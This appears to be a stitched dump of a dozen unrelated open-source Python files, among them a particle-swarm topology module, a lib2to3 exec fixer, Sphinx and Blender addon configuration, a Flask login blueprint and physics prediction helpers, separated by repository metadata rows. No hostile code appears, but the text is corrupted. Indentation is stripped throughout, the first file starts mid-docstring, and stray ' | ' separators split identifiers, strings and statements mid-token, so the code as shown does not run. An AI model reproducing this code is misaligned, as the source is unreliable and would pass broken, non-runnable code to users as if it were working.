contained 10 particles, then this function would return a list
containing 10 lists, each of which contained the neighbors for
its corresponding particle in the population.
Rather than constructing and returning a list of lists directly, the
topology functions could (and probably *should*, for efficiency) be
written as generators that yield each neighborhood list one at a
time. This is how the existing topology functions operate.
.. Copyright 2012 Aaron Garrett
.. Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
.. The above copyright notice and | this permission notice shall be included in
all copies or substantial portions of the Software.
.. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO | THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
.. module:: topologies
.. moduleauthor:: Aaron Garrett <garrett@inspiredintelligence.io>
"""
def star_topology(random, population, args):
"""Returns the neighbors using a star topology.
This function sets all particles as neighbors for all other particles.
This is known as a star topology. The resulting list of lists of
neighbors is returned.
.. Arguments:
random -- the random number generator object
population -- the population of particles
args -- a dictionary of keyword arguments
"""
for _ in range(len(population)):
yield population[:]
def ring_topology(random, population, args):
"""Returns the neighbors using a ring topology.
This function sets all particles in a specified sized neighborhood
as neighbors for a given particle. This is known as a ring
topology. The resulting list of lists of neighbors is returned.
.. Arguments:
random -- the random number generator object
population -- the population of particles
args -- a dictionary of keyword arguments
Optional keyword arguments in args:
- *neighborhood_size* -- the width of the neighborhood around a
particle which determines the size of the neighborhood
(default 3)
"""
neighborhood_size = args.setdefault('neighborhood_size', 3)
half_hood = neighborhood_size // 2
neighbor_index_start = []
for index in range(len(population)):
if index < half_hood:
neighbor_index_start.append(len(population) - half_hood + index)
else:
neighbor_index_start.append(index - half_hood)
neighbors = []
for start in neighbor_index_start:
n = []
for i in range(0, neighborhood_size):
n.append(population[(start + i) % len(population)])
yield n
|
ArcherSys/ArcherSys | Lib/lib2to3/fixes/fix_exec.py | Python | mit | 3,143 | 0.007636 | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for exec.
This converts usages of the exec statement into calls to a built-in
exec() function.
exec code in ns1, ns2 -> exec(code, ns1, ns2)
"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Comma, Name, Call
class FixExec(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
exec_stmt< 'exec' a=any 'in' b=any [',' c=any] >
|
exec_stmt< 'exec' (not atom<' | (' [any] ')'>) a=any >
"""
def transform(self, node, results):
assert results
syms = self.syms
a = results["a"]
b = results.get("b")
c = results.get("c")
args = [a.clone()]
args[0].prefix = ""
if b is | not None:
args.extend([Comma(), b.clone()])
if c is not None:
args.extend([Comma(), c.clone()])
return Call(Name("exec"), args, prefix=node.prefix)
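# Illustrative note (not part of the original fixer): applied by 2to3,
# the pattern above rewrites, for example,
#     exec code in ns
# into
#     exec(code, ns)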
|
rowinggolfer/openmolar2 | configure.py | Python | gpl-3.0 | 6,157 | 0.012993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
## ##
## Copyright 2011-2012, Neil Wallace <neil@openmolar.com> ##
## ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## (at your option) any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
###############################################################################
import __builtin__
import ConfigParser
import logging
import optparse
import os
import StringIO
import sys
from version_number import VERSION_NUMBER
import version_manager
version_manager.main()
sys.path.insert(0, os.path.abspath("src"))
logging.basicConfig(level=logging.ERROR)
class OMConfig(ConfigParser.RawConfigParser):
'''
subclass RawConfigParser with default values and an overwrite of the write
function so that a nice header is included
'''
HEADER = '''
# As openmolar is a suite of applications with a common source code directory
# some configuration is required before running setup.py
#
# setup.py is capable of installing any combination of
# common, admin, server, client, language "packages"
#
# or creating a pure source distribution for that element
#
'''
DICT = {"namespace":'False',
"common": 'False',
"client": 'False',
"admin" : 'False',
"server": 'False',
"lang" : 'False'}
ATTS = DICT.keys()
def __init__(self):
ConfigParser.RawConfigParser.__init__(self)
for att in self.ATTS:
self.add_section(att)
self.set(att, "include", self.DICT[att])
self.set(att, "version", VERSION_NUMBER)
try:
if att not in ("namespace", "lang"):
# this is the equiv of
# from admin import version
logging.debug("getting version for %s"% att)
version = __import__("lib_openmolar.%s.version"% att, fromlist=["version"])
self.set(att, "revision_number", version.revision_number)
self.set(att, "revision_id", version.revision_id)
try:
__builtin__.__dict__.pop("LOGGER")
__builtin__.__dict__.pop("SETTINGS")
except KeyError:
pass
except ImportError:
logging.exception(
"IMPORT ERROR - hg generated version files not present for package %s"% att)
sys.exit("version files not present. Unable to proceed")
def write(self, f):
'''
re-implement write so that our header is included
'''
f.write(self.HEADER)
ConfigParser.RawConfigParser.write(self, f)
class Parser(optparse.OptionParser):
def __init__(self):
optparse.OptionParser.__init__(self)
option = self.add_option("-n", "--namespace",
dest = "namespace",
action="store_true", default=False,
help = "package or install sources fo | r the namespace"
)
option = self.add_option("-a", "--admin",
dest = "admin",
action="store_true", default=False,
help = "pa | ckage or install sources for the admin application"
)
option = self.add_option("-c", "--client",
dest = "client",
action="store_true", default=False,
help = "package or install sources for the client application"
)
option = self.add_option("-l", "--lang",
dest = "lang",
action="store_true", default=False,
help = "package or install sources for the language pack"
)
option = self.add_option("-o", "--common",
dest = "common",
action="store_true", default=False,
help = "package or install sources for lib_openmolar.common"
)
option = self.add_option("-s", "--server",
dest = "server",
action="store_true", default=False,
help = "package or install sources for the server application"
)
def manual_select(options):
print "please choose from the following"
for att in OMConfig.ATTS:
result = raw_input("Include %s (Y/n)"% att)
options.__dict__[att] = str(result.lower() in ("y", ""))
if __name__ == "__main__":
parser = Parser()
options, args = parser.parse_args()
if parser.values == parser.defaults:
try:
manual_select(options)
except:
parser.print_help()
sys.exit("nothing to do")
config = OMConfig()
for att in config.ATTS:
config.set(att, "include", options.__dict__[att])
f = open("setup.cnf", "w")
config.write(f)
f.close()
|
mawenbao/pelican-blog-content | plugins/summary/summary.py | Python | bsd-3-clause | 1,503 | 0.002001 | # -*- encoding: UTF-8 -*-
from __future__ import unicode_literals
from HTMLParser import HTMLParser
from pelican import signals, contents
_MAX_SUMMARY_POS = 45
class FirstParagraphParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.paragraphTag = 'p'
self.data = ''
self.currTags = []
def handle_starttag(self, tag, attrs):
if not self.data and self.paragraphTag == tag.lower():
self.currTags.append('p')
elif self.currTags:
self.currTags.append(tag)
def handle_endtag(self, tag):
if self.currTags:
self.currTags.pop()
def handle_data(self, data):
if self.currTags:
self.data += data
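# Illustrative sketch (not part of the plugin): exercising the parser
# directly -- only the first <p> element's text is captured.
#   p = FirstParagraphParser()
#   p.feed('<p>First paragraph.</p><p>Second paragraph.</p>')
#   assert p.data == 'First paragraph.'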
def content_object_init(instance):
if isinstance(instance, contents.Static):
return
if 'summary' in instance.metadata:
return
if not hasattr(instance, '_summary') and instance._content is not None:
| content = instance._content
firstP = FirstParagraphParser()
firstP.feed(content)
endCharA = '。'
endCharB = '.'
endPosA = firstP.data.find(endCharA)
endPosB = firstP.data.find(endCharB)
endPos = min(max(endPosA, endPosB), _MAX_SUMMARY_POS)
instance._summary = firstP.data[:endPos + 1 if endPos > 0 else None]
if endPos == _MAX_SUMMARY_POS:
instance._summary += ' …'
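# Illustrative walk-through (hypothetical article body, not from the plugin's
# tests): for '<p>First point. More detail.</p><p>Second paragraph.</p>' the
# parser collects only 'First point. More detail.'; the first '.' sits at
# index 11, so instance._summary becomes 'First point.'. When the first
# sentence end lies beyond _MAX_SUMMARY_POS, the cut is clamped there and
# ' …' is appended; with no sentence end at all, the whole first paragraph
# is kept.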
def register():
    signals.content_object_init.connect(content_object_init)
|
NikolausDemmel/catkin_tools | docs/conf.py | Python | apache-2.0 | 8,535 | 0.005272 | # -*- coding: utf-8 -*-
#
# catkin_tools documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 24 18:03:21 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# import sys
# import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'catkin_tools'
copyright = u'2014, Open Source Robotics Foundation, Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0'
# The full version, including alpha/beta/rc tags.
release = '0.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'catkin_toolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'catkin_tools.tex', u'catkin\\_tools Documentation',
u'William Woodall', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'catkin_tools', u'catkin_tools Documentation',
[u'William Woodall'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'catkin_tools', u'catkin_tools Documentation',
u'William Woodall', 'catkin_tools', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
hacktyler/hacktyler_crime | sirens/urls.py | Python | mit | 250 | 0.008 | #!/usr/bin/env python
from django.conf.urls.defaults import patterns, url
from sirens import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
    url(r'^pusher/auth$', views.pusher_user_auth, name='pusher_user_auth')
)
|
Microvellum/Fluid-Designer | win64-vc/2.78/scripts/addons/cycles/__init__.py | Python | gpl-3.0 | 3,600 | 0.001667 | #
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# <pep8 compliant>
bl_info = {
"name": "Cycles Render Engine",
"author": "",
"blender": (2, 76, 0),
"location": "Info header, render engine menu",
"description": "Cycles Render Engine integration",
"warning": "",
"wiki_url": "https://www.blender.org/manual/render/cycles/index.html",
"tracker_url": "",
"support": 'OFFICIAL',
"category": "Render"}
import bpy
from . import (
engine,
version_update,
)
class CyclesRender(bpy.types.RenderEngine):
bl_idname = 'CYCLES'
bl_label = "Cycles Render"
bl_use_shading_nodes = True
bl_use_preview = True
bl_use_exclude_layers = True
bl_use_save_buffers = True
bl_use_spherical_stereo = True
def __init__(self):
self.session = None
def __del__(self):
engine.free(self)
# final render
def update(self, data, scene):
if not self.session:
if self.is_preview:
cscene = bpy.context.scene.cycles
use_osl = cscene.shading_system and cscene.device == 'CPU'
engine.create(self, data, scene,
None, None, None, use_osl)
else:
engine.create(self, data, scene)
else:
engine.reset(self, data, scene)
def render(self, scene):
engine.render(self)
def bake(self, scene, obj, pass_type, pass_filter, object_id, pixel_array, num_pixels, depth, result):
engine.bake(self, obj, pass_type, pass_filter, object_id, pixel_array, num_pixels, depth, result)
# viewport render
def view_update(self, context):
if not self.session:
engine.create(self, context.blend_data, context.scene,
context.region, context.space_data, context.region_data)
engine.update(self, context.blend_data, context.scene)
def view_draw(self, context):
engine.draw(self, context.region, context.space_data, context.region_data)
def update_script_node(self, node):
if engine.with_osl():
from . import osl
osl.update_script_node(node, self.report)
else:
self.report({'ERROR'}, "OSL support disabled in this build.")
def engine_exit():
engine.exit()
def register():
from . import ui
from . import properties
from . import presets
import atexit
# Make sure we only registered the callback once.
atexit.unregister(engine_exit)
atexit.register(engine_exit)
engine.init()
properties.register()
ui.register()
presets.register()
bpy.utils.register_module(__name__)
bpy.app.handlers.version_update.append(version_update.do_versions)
def unregister():
from . import ui
from . import properties
from . import presets
import atexit
bpy.app.handlers.version_update.remove(version_update.do_versions)
ui.unregister()
properties.unregister()
presets.unregister()
bpy.utils.unregister_module(__name__)
|
jmluy/xpython | exercises/practice/custom-set/.meta/example.py | Python | mit | 1,184 | 0 | class CustomSet:
def __init__(self, elements=None):
self.elements = list(elements) if elements is not None else list([])
def isempty(self):
        return not self.elements
def __iter__(self):
return iter(self.elements)
def __contains__(self, element):
return element in self.elements
def issubset(self, other):
return all(idx in other for idx in self)
def isdisjoint(self, other):
        return all(idx not in other for idx in self)
def __eq__(self, other):
return self.issubset(other) and other.issubset(self)
def add(self, element):
if element not in self:
self.elements.append(element)
def intersection(self, other):
result = CustomSet()
for idx in self:
if idx in other:
result.add(idx)
return result
def __sub__(self, other):
result = CustomSet()
for idx in self:
if idx not in other:
result.add(idx)
return result
def __add__(self, other):
result = CustomSet(self.elements)
for idx in other:
result.add(idx)
return result
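# Minimal usage sketch (illustrative only, not part of the exercise tests):
if __name__ == "__main__":
    a = CustomSet([1, 2, 3])
    b = CustomSet([3, 4])
    assert 2 in a                               # __contains__
    assert a.intersection(b) == CustomSet([3])  # shared elements
    assert (a - b) == CustomSet([1, 2])         # difference via __sub__
    assert (a + b) == CustomSet([1, 2, 3, 4])   # union via __add__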
|
openego/dingo | ding0/core/network/cable_distributors.py | Python | agpl-3.0 | 2,143 | 0.007933 | """This file is part of DING0, the DIstribution Network GeneratOr.
DING0 is a tool to generate synthetic medium and low voltage power
distribution grids based on open data.
It is developed in the project open_eGo: https://openegoproject.wordpress.com
DING0 lives at github: https://github.com/openego/ding0/
The documentation is available on RTD: http://ding0.readthedocs.io"""
__copyright__ = "Reiner Lemoine Institut gGmbH"
__license__ = "GNU Affero General Public License Version 3 (AGPL-3.0)"
__url__ = "https://github.com/openego/ding0/blob/master/LICENSE"
__author__ = "nesnoj, gplssm"
from . import CableDistributorDing0
class MVCableDistributorDing0(CableDistributorDing0):
""" MV Cable distributor (connection point)
Attributes
----------
lv_load_area_group :
Description #TODO
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.lv_load_area_group = kwargs.get('lv_load_area_group', None)
self.id_db = self.grid.cable_distributors_count() + 1
@property
def pypsa_id(self):
""" :obj:`str`: Returns ...#TODO
"""
        return '_'.join(['MV', str(self.grid.id_db),
'cld', str(self.id_db)])
def __repr__(self):
return 'mv_cable_dist_' + repr(self.grid) + '_' + str(self.id_db)
class LVCableDistributorDing0(CableDistributorDing0):
""" LV Cable distributor (connection point)
Attributes
----------
string_id :
Description #TODO
branch_no :
Description #TODO
load_no :
        Description #TODO
in_building :
Description #TODO
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.string_id = kwargs.get('string_id', None)
self.branch_no = kwargs.get('branch_no', None)
self.load_no = kwargs.get('load_no', None)
self.id_db = self.grid.cable_distributors_count() + 1
self.in_building = kwargs.get('in_building', False)
def __repr__(self):
return 'lv_cable_dist_' + repr(self.grid) + '_' + str(self.id_db)
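# Rough usage sketch (illustrative; it assumes the CableDistributorDing0 base
# class stores the ``grid`` keyword on ``self.grid``, which the constructors
# above rely on):
#
#   cd = MVCableDistributorDing0(grid=mv_grid)  # mv_grid: a Ding0 MV grid
#   cd.pypsa_id  # -> 'MV_<grid id>_cld_<id_db>', e.g. 'MV_1_cld_1'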
|
michaelchu/kaleidoscope | kaleidoscope/options/iterator/option_chain.py | Python | mit | 849 | 0 | from kaleidoscope.event import DataEvent
from kaleidoscope.options.option_query import OptionQuery
class OptionChainIterator(object):
def __init__(self, data):
self.data = data
# get all quote dates that can be iterated
self.dates = sorted(data['quote_date'].unique())
# turn list of dates into an iterable
self.dates = iter(self.dates)
def __iter__(self):
return self
def __next__(self):
try:
df = self.data
quote_date = next(self.dates)
# return a data event containing the daily quote for option chains
            option_chains = df.loc[df['quote_date'] == quote_date]
# create the data event and return it
return DataEvent(quote_date, OptionQuery(option_chains))
except StopIteration:
raise
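# Rough usage sketch (illustrative; any column besides 'quote_date' is an
# assumption about the option-chain DataFrame):
#
#   import pandas as pd
#   chains = pd.DataFrame({'quote_date': ['2017-01-03', '2017-01-04'],
#                          'symbol': ['VXX', 'VXX']})
#   for event in OptionChainIterator(chains):
#       handle(event)  # one DataEvent per quote date, wrapping an OptionQuery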
|
flav-io/flavio | flavio/functions.py | Python | mit | 13,966 | 0.00222 | """Main functions for user interaction. All of these are imported into the
top-level namespace."""
import flavio
import numpy as np
from collections import defaultdict
from multiprocessing import Pool
from functools import partial
import warnings
def np_prediction(obs_name, wc_obj, *args, **kwargs):
"""Get the central value of the new physics prediction of an observable.
Parameters
----------
    - `obs_name`: name of the observable as a string
- `wc_obj`: an instance of `flavio.WilsonCoefficients`
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
return obs.prediction_central(flavio.default_parameters, wc_obj, *args, **kwargs)
def sm_prediction(obs_name, *args, **kwargs):
"""Get the central value of the Standard Model prediction of an observable.
Parameters
----------
- `obs_name`: name of the observable as a string
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
return obs.prediction_central(flavio.default_parameters, wc_sm, *args, **kwargs)
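# For example (the observable names below are illustrations; valid names are
# defined by the Observable class, not by this module):
#
#     flavio.sm_prediction('BR(Bs->mumu)')
#     flavio.sm_prediction('dBR/dq2(B0->K*mumu)', q2=3.0)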
def _obs_prediction_par(par, obs_name, wc_obj, *args, **kwargs):
obs = flavio.classes.Observable.get_instance(obs_name)
return obs.prediction_par(par, wc_obj, *args, **kwargs)
def np_uncertainty(obs_name, wc_obj, *args, N=100, threads=1, **kwargs):
"""Get the uncertainty of the prediction of an observable in the presence
of new physics.
Parameters
----------
- `obs_name`: name of the observable as a string
- `wc_obj`: an instance of `flavio.WilsonCoefficients`
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainty returned is given by $1/\sqrt{2N}$.
- `threads` (optional): if bigger than one, number of threads for parallel
computation of the uncertainty.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
par_random = flavio.default_parameters.get_random_all(size=N)
par_random = [{k: v[i] for k, v in par_random.items()} for i in range(N)]
if threads == 1:
# not parallel
all_pred = np.array([_obs_prediction_par(par, obs_name, wc_obj, *args, **kwargs) for par in par_random])
else:
# parallel
pool = Pool(threads)
# convert args to kwargs
_kwargs = kwargs.copy()
obs_args = flavio.Observable[obs_name].arguments
for i, a in enumerate(args):
_kwargs[obs_args[i]] = a
all_pred = np.array(
pool.map(
partial(_obs_prediction_par,
obs_name=obs_name, wc_obj=wc_obj, **_kwargs),
par_random))
pool.close()
pool.join()
return np.std(all_pred)
def sm_uncertainty(obs_name, *args, N=100, threads=1, **kwargs):
"""Get the uncertainty of the Standard Model prediction of an observable.
Parameters
----------
- `obs_name`: name of the observable as a string
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainty returned is given by $1/\sqrt{2N}$.
- `threads` (optional): if bigger than one, number of threads for parallel
computation of the uncertainty.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
wc_sm = flavio.physics.eft._wc_sm
return np_uncertainty(obs_name, wc_sm, *args, N=N, threads=threads, **kwargs)
class AwareDict(dict):
"""Generalization of dictionary that adds the key to the
set `akeys` upon getting an item."""
def __init__(self, d):
"""Initialize the instance."""
super().__init__(d)
self.akeys = set()
self.d = d
def __getitem__(self, key):
"""Get an item, adding the key to the `pcalled` set."""
self.akeys.add(key)
return dict.__getitem__(self, key)
def __copy__(self):
cp = type(self)(self.d)
cp.akeys = self.akeys
return cp
def copy(self):
return self.__copy__()
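# Sketch of the tracking behaviour (follows directly from the class above):
#
#   d = AwareDict({'a': 1, 'b': 2})
#   _ = d['a']
#   d.akeys  # -> {'a'}: only keys actually read are recorded, which is
#            # what get_dependent_parameters_sm exploits below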
class AwareWilson(flavio.WilsonCoefficients):
"""Subclass of `flavio.WilsonCoefficients` that adds the arguments of calls
to its `match_run` method to `atuples` attribute."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.atuples = set()
def match_run(self, scale, eft, basis, sectors='all'):
self.atuples.add((scale, eft, basis, sectors))
return super().match_run(scale, eft, basis, sectors)
def get_dependent_parameters_sm(obs_name, *args, **kwargs):
"""Get the set of parameters the SM prediction of the observable depends on."""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
par_central = flavio.default_parameters.get_central_all()
apar_central = AwareDict(par_central)
obs.prediction_par(apar_central, wc_sm, *args, **kwargs)
# return all observed keys except the ones that don't actually correspond
# to existing parameter names (this might happen by user functions modifying
# the dictionaries)
return {p for p in apar_central.akeys
if p in flavio.Parameter.instances.keys()}
def get_dependent_wcs(obs_name, *args, **kwargs):
"""Get the EFT, basis, scale, and sector of Wilson coefficients
the NP prediction of the observable depends on.
Returns a set of tuples of the form
`(scale, eft, basis, sectors)`,
where sectors is a tuple of WCxf sectors or 'all'.
Note that this function simply checks the arguments with which the
`match_run` method of the underlying `wilson.Wilson` instance is called.
Thus it is only guaranteed that the Wilson coefficients the observable
actually depends on are contained in these sectors."""
awc = AwareWilson()
# need at least one non-zero WC to make sure match_run is called at all
awc.set_initial({'G': 1e-30}, 91.1876, 'SMEFT', 'Warsaw')
np_prediction(obs_name, awc, *args, **kwargs)
return awc.atuples
def sm_error_budget(obs_name, *args, N=50, **kwargs):
"""Get the *relative* uncertainty of the Standard Model prediction due to
variation of individual observables.
Parameters
----------
- `obs_name`: name of the observable as a string
- `N` (optional): number of random evaluations of the observable.
The relative accuracy of the uncertainties returned is given by $1/\sqrt{2N}$.
Additional arguments are passed to the observable and are necessary,
depending on the observable (e.g. $q^2$-dependent observables).
"""
obs = flavio.classes.Observable[obs_name]
wc_sm = flavio.physics.eft._wc_sm
par_central = flavio.default_parameters.get_central_all()
par_random = [flavio.default_parameters.get_random_all() for i in range(N)]
pred_central = obs.prediction_par(par_central, wc_sm, *args, **kwargs)
# Step 1: determine the parameters the observable depends on at all.
dependent_par = get_dependent_parameters_sm(obs_name, *args, **kwargs)
# Step 2: group parameters if correlated
par_constraint = {p: id(flavio.default_parameters._parameters[p][1]) for p in dependent_par}
v = defaultdict(list)
for key, value in par_constraint.items():
v[value].append(key)
dependent_par_lists = list(v.values())
# Step 3: for each of the (groups of) dependent parameters, determine the error
# analogous to the sm_uncertainty function. Normalize to the central
# prediction (so relative errors are returned)
individual_errors = {}
def make_par_random(keys, par_random):
par_tmp = par_central.copy()
for key in keys:
par_tmp[key] = par_random[key]
return par_tmp
    for p in dependent_par_lists:
looker-open-source/sdk-codegen | examples/python/lookersdk-flask/app/auth.py | Python | mit | 2,667 | 0.001125 | import functools
import os
import flask
import werkzeug.security
from .db import get_db
from .looker import get_my_user
bp = flask.Blueprint("auth", __name__, url_prefix="/auth")
@bp.route("/register", methods=("GET", "POST"))
def register():
if flask.request.method == "POST":
username = flask.request.form["username"]
password = flask.request.form["password"]
db = get_db()
error = None
if not username:
error = "Username is required."
elif not password:
error = "Password is required."
elif (
db.execute("SELECT id FROM user WHERE username = ?", (username,)).fetchone()
is not None
):
error = "User {} is already registered.".format(username)
if error is None:
db.execute(
"INSERT INTO user (username, password) VALUES (?, ?)",
(username, werkzeug.security.generate_password_hash(password)),
)
db.commit()
flask.flash("Successfully registered. You may now log in.")
return flask.redirect(flask.url_for("auth.login"))
flask.flash(error)
return flask.render_template("auth/register.html")
@bp.route("/login", methods=("GET", "POST"))
def login():
if flask.request.method == "POST":
username = flask.request.form["usern | ame"]
password = flask.request.form["password"]
db = get_db()
error = None
user = db.execute(
"SELECT * FROM user WHERE username = ?", (username,)
).fetchone()
if user is None:
error = "Incorrect username."
elif not werkzeug.security.check_password_hash(user["password"], password):
error = "Incorrect password."
if error is None:
flask.session.clear()
flask.session["user_id"] = user["id"]
flask.session["user_name"] = user["username"]
return flask.redirect(flask.url_for("index"))
flask.flash(error)
return flask.render_template("auth/login.html")
# This fires before every request and loads in the looker base URL to be available in the header
@bp.before_app_request
def load_instance():
flask.session["lookerurl"] = os.environ.get("LOOKERSDK_BASE_URL")
@bp.route("/logout")
def logout():
flask.session.clear()
return flask.redirect(flask.url_for("index"))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if flask.session["user_id"] is None:
return flask.redirect(flask.url_for("auth.login"))
return view(**kwargs)
return wrapped_view
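# Typical use of the decorator (route and view are illustrative):
#
# @bp.route("/me")
# @login_required
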